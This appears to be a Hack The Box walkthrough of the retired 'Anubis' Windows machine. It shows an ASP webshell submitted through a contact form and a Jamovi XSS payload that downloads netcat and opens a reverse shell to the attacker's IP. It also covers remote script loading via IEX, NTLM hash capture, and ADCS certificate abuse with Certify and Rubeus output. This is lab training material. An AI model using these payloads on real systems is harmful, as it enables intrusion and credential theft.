Anubis: Hack The Box Walkthrough
source link: https://hackso.me/anubis-htb-walkthrough/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
This post documents the complete walkthrough of Anubis, a retired vulnerable VM created by 4ndr34z, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
On this post
Background
Anubis is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan
probe to establish the open ports in the host.
masscan -e tun0 -p1-65535,U:1-65535 10.10.11.102 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-08-16 03:46:36 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 593/tcp on 10.10.11.102
Discovered open port 443/tcp on 10.10.11.102
Discovered open port 49727/tcp on 10.10.11.102
Discovered open port 445/tcp on 10.10.11.102
Discovered open port 135/tcp on 10.10.11.102
Not much going on. Let’s do one better with nmap
scanning the discovered ports to establish their services.
nmap -n -v -Pn -135,443,445,49727 -A --reason 10.10.11.102 -oN nmap.txt
...
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
443/tcp open ssl/http syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=www.windcorp.htb
| Subject Alternative Name: DNS:www.windcorp.htb
| Issuer: commonName=www.windcorp.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-05-24T19:44:56
| Not valid after: 2031-05-24T19:54:56
| MD5: e2e7 86ef 4095 9908 14c5 3347 cdcb 4167
|_SHA-1: 7fce 781f 883c a27e 1154 4502 1686 ee65 7551 0e2a
|_ssl-date: 2021-08-16T04:07:24+00:00; 0s from scanner time.
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
I’d better map www.windcorp.htb
to 10.10.11.102
in /etc/hosts
. This is what the site looks like.
Directory/File Enumeration
Let’s see what we can glean from gobuster
and SecLists.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -e -k -t 20 -x asp,txt -u
https://www.windcorp.htb/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://www.windcorp.htb/
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: asp,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/08/16 05:59:06 Starting gobuster in directory enumeration mode
===============================================================
https://www.windcorp.htb/test.asp (Status: 200) [Size: 518]
https://www.windcorp.htb/assets (Status: 301) [Size: 155] [--> https://www.windcorp.htb/assets/]
https://www.windcorp.htb/forms (Status: 301) [Size: 154] [--> https://www.windcorp.htb/forms/]
https://www.windcorp.htb/services.asp (Status: 200) [Size: 21596]
https://www.windcorp.htb/preview.asp (Status: 200) [Size: 3803]
https://www.windcorp.htb/save.asp (Status: 302) [Size: 157] [--> https://www.windcorp.htb/preview.asp]
https://www.windcorp.htb/readme.txt (Status: 200) [Size: 215]
https://www.windcorp.htb/changelog.txt (Status: 200) [Size: 1386]
===============================================================
2021/08/16 05:59:42 Finished
===============================================================
Contact
Interestingly, there’s a contact form that refers to save.asp
. Suppose we send a message like so.
We see this in test.asp
.
Looks like we are able to execute VBScript.
ASP Webshell
Kali Linux has just the right ASP webshell for the job.
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
When we send the above in a message to save.asp
, we get this in test.asp
.
Whoa, it can’t be this easy, right?
Windows Server Container
I think we are inside a Windows Server Container.
Foothold
Let’s download a copy of nc64.exe
and save it as C:\temp\cute.exe
.
And run a reverse shell back to us.
A reverse shell appears in our netcat
…
Breaking Out of a Windows Container
During enumeration of the container, I was lucky to find ConsoleHost_history.txt
where the creator(s) were kind enough to leave clues on how to proceed.
Enter PowerProxy—A SOCKS proxy with reverse proxy capabilities. With PowerProxy, I’m able to set up a SOCKS4 proxy in the container, allowing me to port-scan hosts in the same network as the container otherwise not accesible to me. Recall the container’s IP address is 172.21.132.45
and the gateway’s IP address is 172.21.128.1
? Normally the gateway is the host.
Run this in your machine.
python3 reverse_proxy_handler.py -p 8080
Run this in the container.
start powershell -c "Import-Module \temp\PowerProxy.ps1; Start-ReverseSocksProxy 10.10.14.64 -Port 8080"
Let’s scan ports commonly found in Windows.
proxychains -q nmap -sT -T4 -n -Pn 172.21.128.1 -p80,443,445,5985 --open 2>/dev/null
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-09 15:30 UTC
Nmap scan report for 172.21.128.1
Host is up (0.028s latency).
Not shown: 1 closed port
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 21.56 seconds
This is what 80/tcp
looks like.
Software Portal
The software offering looks interesting. The URL to 7-zip looks like this.
http://softwareportal.windcorp.htb/install.asp?client=172.21.129.14&software=7z1900-x64.exe
What if I change the client IP address to my own and fire tcpdump
with the following filter to see what type of traffic comes in?
Interesting. The software portal is trying to connect to WinRM on my machine. Let’s give it what it wants. The latest version Responder now offers rogue WinRM to capture NTLMv2 hashes.
Awesome. Let’s run the hash through JtR and see what we have.
We have a set of credentials (windcorp\localadmin:Secret123
).
SMB Enumeration
Let’s see what we can glean with these credentials.
Especially what’s in Shared
.
CVE-2021-28079 - Jamovi <= 1.16.18 Cross-Site Scripting Vulnerability
It’s no wonder the creator of this box is one of the people who discovered this vulnerability. The column-name is vulnerable to XSS in the ELectonJS Framework. An attacker can make a .OMV document containing a payload.
Notice the last-modification date of Whatif.omv
in Shared\Documents\Analytics
above is more current than the rest of the .OMV files? I suspect there’s scheduled task that opens Whatif.omv
with a vulnerable Jamovi at some point in time.
Taking a leaf from the POC video, we can change the column-name to the following XSS payload in metadata.json
The XSS payload will fetch jamovi.js
from Python’s http.server
and hopefully Jamovi will execute the JS. This is what jamovi.js
looks like.
const p = require("child_process");
p.exec("powershell -c iwr http://10.10.14.64:8000/nc64.exe -outf \\windows\\system32\\spool\\drivers\\color\\cute.exe");
p.exec("start \\windows\\system32\\spool\\drivers\\color\\cute.exe 10.10.14.64 4321 -e cmd.exe");
I’ve chosen to download nc64.exe
from Python’s http.server
and save it to a Windows world-writable folder as cute.exe
and then use it to run a reverse shell back to me.
The file user.txt
is in diegocruz
’s Desktop.
Privilege Escalation
During enumeration of diegocruz
’s account, I notice that Active Directory Certificate Services (ADCS) is installed.
Certified Pre-Owned
Read this post for details on attacking misconfigured ADCS. Note that the building of Certify and Rubeus in Visual Studio is beyond the scope of this write-up.
Now check this out with Certify.exe find
.
The domain group WINDCORP\webdevelopers
has full control over the Web Certificate Template. And guess what—diegocruz
is the only member in the group.
Here’s the game plan.
- Reconfigure the Web template to issue certificate for Smartcard Logon
- Enroll Administrator to get a certificate for Smartcard Logon
- Use Rubeus to obtain TGT for Administrator and reveal NTLM hash
- Profit!
Step 1 - Reconfigure Web template
Step 1 can be easily completed with the help of PoshADCS cmdlet Set-ADCSTemplate
.
IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.64/PowerView.ps1
IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.64/ADCS.ps1
IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.64/Reconfigure-Template.ps1")
Where Reconfigure-Template.ps1
is
$Properties = @{}
$Properties.Add('mspki-certificate-name-flag',1)
$Properties.Add('pkiextendedkeyusage',@('1.3.6.1.4.1.311.20.2.2','1.3.6.1.5.5.7.3.2'))
$Properties.Add('msPKI-Certificate-Application-Policy',@('1.3.6.1.4.1.311.20.2.2','1.3.6.1.5.5.7.3.2'))
$Properties.Add('flags','CLEAR')
$Properties.Add('mspki-enrollment-flag',0)
$Properties.Add('mspki-private-key-flag',256)
$Properties.Add('pkidefaultkeyspec',1)
Set-ADCSTemplate -Name Web -Properties $Properties -Force
After adding Smartcard Logon to Web certificate template this is what it looks like.
Step 2 - Enroll Administrator to get a certificate for Smartcard Logon
Certify has a nifty feature for this step.
.\Certify.exe request /ca:earth.windcorp.htb\windcorp-CA /template:Web /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Request a Certificates
[*] Current user context : WINDCORP\diegocruz
[*] No subject name specified, using current context as subject.
[*] Template : Web
[*] Subject : CN=Diego Cruz, OU=MainOffice, DC=windcorp, DC=htb
[*] AltName : Administrator
[*] Certificate Authority : earth.windcorp.htb\windcorp-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 3
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAprOGHBhdZ1VDiMhBbVvwkuEUMxMnNtZD0Yrs5cmA2YD57u2y
FB4FvapRj1POTTHg/p35OfohVTg8urA5A+TLkm0iVweMPjx1SKphFRCDFYFeMWut
mHkbilH2L/XREi/l2K3UMItf/A1Gt4gRqc2MOcQOu0niu0x6YRDAMzRCIF5OAHPo
ZK8ibiRvFPo8QJzk/T/UHnaqX9kbWC9uHglVYAEg4a/fx+6+NmYK4b6/iDiLc+LP
FJz8jcTveYAsE3vsTTvjf+1jFX0ImOQFOQJZ8kKPqiKq7wBMn0rFTTfmicruJyDn
c7Fhr2yePCN4aRLY1i4z3PrMFLt/fbrYHRvrZQIDAQABAoIBAD2plmf6E0LP5UVJ
XfpH0ftiyogCA7VjGH8ANpThLopGDS12OzL50AHSaIzt4Rfo5WMJqFDr1zygqsYb
vVtVXH/zYopyvkufLXsNmw+hpftkeSUqwXHvCmLl4nznHsjtcsXtttmmFIE1n/zv
likLYV1UymY49Gd36KTS/2VxZSx3XNqxwqvDPAe1NclNvSJTv9C+DlzpO/xv9s2U
yGHopnw/QdjzOFaZixkgtYg1rzAapUPsz1TNiFQw1VbcTV6zYCbptacGhfg7BToq
+IlnrCWMct6AUUkaLsV2DqL2fNn8VYwIwCUOlhsZWSKJMKY1BejmzZyLWGAuxQMd
6oFwxBkCgYEAyMUV+vnMUFBKn25gWzjbvEOCgw/RjuZZngWmOTeGjXsOUsOSSvv0
rVlGYpHqclTQ6VRTafKL+9jGyFBYxa1go6XcoJBWQqnhvEQziph+FQ8TEmOPoShP
VscZjJJmkpaoZ6FGNrKXMLM+7cSa6rAj4rJQ54jkSxZ8uGZXtf1NjncCgYEA1I81
UdQsDBpqjes0fyL9j9R6sPnIQ2VD5VhTyyogm/RZEaiMXXacCoqr+WeDdYr+JMn6
x2Oda47Q5aCiuCqU3WFhc7dYTd0In3gbK/MdwWveyLUl6VdkfBxGjVkqlaZ0lULQ
qAibsG2/m4RJZCSLkVq/rpZagHLxvTVOFIz2wAMCgYEAwEGrCMlI0+fvbbje4LwT
/7aONj9hp3wCeYZjZQs8+CLM1oidgNzBs3Z4JlAguBdsbuPndN9lGWi/Aneear3a
exuLqN5PHEtd9VFCIghhRH1JACUDF4poX2sNlkVjoCBRZ9tSR3LBwUsEid/pka/W
zXGAdBfstdL04AhxGb9VE4UCgYAbfMV9Zn2ntwbOgXsRcdnubqDLIBIIvSCxmOGF
JVaANHIMOYqlT4BQUKx6nSs/2RCSe1glzrj9vsM+3q4MON11X3F1wGD3+Lxzutlw
rojLiYKO2/YiHb4N2q44+y3pmlP7NV+8SxivERI1Lz86ZwtxaZXeIu1jLPob6LfH
Ko+CNwKBgEv2XyTCiegLpygk4Z/EAVdwjnTfixrgz7BbjKF5w92EAjN7p1NiA3LQ
LCTNsI+28G+X06z+osE09B7jgFGfU4S3cuSnf8e5bdeFVSp/qdp+KxV6/4p2qoTF
bkFpG69LiAUVS1x2Aa9ly32OWNyk9OnODnPlw9UN/ebdMMHMpnEp
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIFwDCCBKigAwIBAgITMwAAAANzu1dpiaKKUQAAAAAAAzANBgkqhkiG9w0BAQsF
ADBFMRMwEQYKCZImiZPyLGQBGRYDaHRiMRgwFgYKCZImiZPyLGQBGRYId2luZGNv
cnAxFDASBgNVBAMTC3dpbmRjb3JwLUNBMB4XDTIxMTAxMTAyNDUxM1oXDTIzMTAx
MTAyNTUxM1owWTETMBEGCgmSJomT8ixkARkWA2h0YjEYMBYGCgmSJomT8ixkARkW
CHdpbmRjb3JwMRMwEQYDVQQLEwpNYWluT2ZmaWNlMRMwEQYDVQQDEwpEaWVnbyBD
cnV6MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAprOGHBhdZ1VDiMhB
bVvwkuEUMxMnNtZD0Yrs5cmA2YD57u2yFB4FvapRj1POTTHg/p35OfohVTg8urA5
A+TLkm0iVweMPjx1SKphFRCDFYFeMWutmHkbilH2L/XREi/l2K3UMItf/A1Gt4gR
qc2MOcQOu0niu0x6YRDAMzRCIF5OAHPoZK8ibiRvFPo8QJzk/T/UHnaqX9kbWC9u
HglVYAEg4a/fx+6+NmYK4b6/iDiLc+LPFJz8jcTveYAsE3vsTTvjf+1jFX0ImOQF
OQJZ8kKPqiKq7wBMn0rFTTfmicruJyDnc7Fhr2yePCN4aRLY1i4z3PrMFLt/fbrY
HRvrZQIDAQABo4ICkzCCAo8wOwYJKwYBBAGCNxUHBC4wLAYkKwYBBAGCNxUIsrAi
h4Xrf4bphxiFkKlUxdkzJoaox1ODlPQcAgFkAgECMB8GA1UdJQQYMBYGCCsGAQUF
BwMCBgorBgEEAYI3FAICMA4GA1UdDwEB/wQEAwIFoDApBgkrBgEEAYI3FQoEHDAa
MAoGCCsGAQUFBwMCMAwGCisGAQQBgjcUAgIwHQYDVR0OBBYEFAO2veIkkIixSwzo
4HKZZd06upHdMCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1BZG1pbmlzdHJh
dG9yMB8GA1UdIwQYMBaAFBBQB/Z7ZTloO4v+uzi7R43NuP8YMIHIBgNVHR8EgcAw
gb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPXdpbmRjb3JwLUNBLENOPWVhcnRoLENO
PUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D
b25maWd1cmF0aW9uLERDPXdpbmRjb3JwLERDPWh0Yj9jZXJ0aWZpY2F0ZVJldm9j
YXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQw
gb4GCCsGAQUFBwEBBIGxMIGuMIGrBggrBgEFBQcwAoaBnmxkYXA6Ly8vQ049d2lu
ZGNvcnAtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9d2luZGNvcnAsREM9aHRiP2NBQ2Vy
dGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5
MA0GCSqGSIb3DQEBCwUAA4IBAQAvHNFwiuG+deSfRxavnDmjBmkpmSWSueXB5wwm
JzY6FZUopcVlwFpcY+NoW+bMAq1d1adJVDKvUfuNOt4scvU1SXUQdghJQEYOChmL
QFzjn1ZsiyiMmBq6pyOPnFCjCMRyDtMkDgwmYnhgYjWYOxEdb5fPUZEj6X5Afrc+
R75ZfS1yzDBwcD45yvTE5qH8AWhpFQq8/5ylyCUv57XUNb8DTfWwTbN+FBzHtw5X
8Ugj6ehNaC0M0d27xtXzukqFvwKAlGYsnMZdfWfmOg2j0oo/Xiul8CybHFuOHoL7
cKx7ljkrznJNyFy79YBdwP2OqRaeBvRhOzKcDd/oeAsF/uHO
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:17.0611875
Step 3 - Use Rubeus to reveal Administrator’s NTLM hash
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password:password123 /getcredentials
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Diego Cruz, OU=MainOffice, DC=windcorp, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'windcorp.htb\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/windcorp.htb
ServiceRealm : WINDCORP.HTB
UserName : Administrator
UserRealm : WINDCORP.HTB
StartTime : 10/11/2021 5:13:00 AM
EndTime : 10/11/2021 3:13:00 PM
RenewTill : 10/18/2021 5:13:00 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : oXPCzp1oL6+KG8FaJJO/Nw==
ASREP (key) : C9671F60EF5739FCCDDA8E0269D003D4
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 3CCC18280610C6CA3156F995B5899E09
Step 4 - Profit!
Armed with Administrator’s NTLM hash, all we need to do is to use Impacket’s psexec.py
to get us a shell.
Getting root.txt
is a breeze.
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK